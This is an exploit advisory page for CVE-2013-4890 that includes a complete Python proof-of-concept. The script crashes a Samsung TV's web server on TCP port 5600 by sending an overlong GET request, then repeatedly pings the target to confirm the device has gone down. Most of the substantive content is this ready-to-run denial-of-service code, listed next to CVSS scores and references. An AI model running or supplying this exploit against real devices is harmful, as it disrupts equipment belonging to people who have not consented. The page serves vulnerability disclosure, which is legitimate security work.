Samsung TV Denial Of Service *youtube

2013-07-23 / 2013-07-24
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-noinfo


CVSS Base Score: 7.8/10
Impact Subscore: 6.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: None
Availability impact: Complete

#!/usr/bin/python # Exploit Title: Samsung TV Denial of Service (DoS) Attack # Exploit Author: Malik Mesellem - @MME_IT - http://www.itsecgames.com # Date: 07/21/2013 # CVE Number: CVE-2013-4890 # Vendor Homepage: http://www.samsung.com # Description: # The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by sending a long HTTP GET request # As a results, the TV reboots... # Tested successfully on my Samsung PS50C7700 plasma TV, with the latest firmware :) import httplib import sys import os print " ***************************************************************************************" print " Author: Malik Mesellem - @MME_IT - http://www.itsecgames.com\n" print " Exploit: Denial of Service (DoS) attack\n" print " Description:\n" print " The web server (DMCRUIS/0.1) on port TCP/5600 is crashing by sending a long request." print " Tested successfully on my Samsung PS50C7700 plasma TV :)\n" print " ***************************************************************************************\n" # Sends the payload print " Sending the malicious payload...\n" conn = httplib.HTTPConnection(sys.argv[1],5600) conn.request("GET", "A"*300) conn.close() # Checks the response print " Checking the status... (CTRL+Z to stop)\n" response = 0 while response == 0: response = os.system("ping -c 1 " + sys.argv[1] + "> /dev/null 2>&1") if response != 0: print " Target down!\n"

References:

http://www.samsung.com
http://www.youtube.com/watch?v=U-R2epNnUiM
http://www.itsecgames.com


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top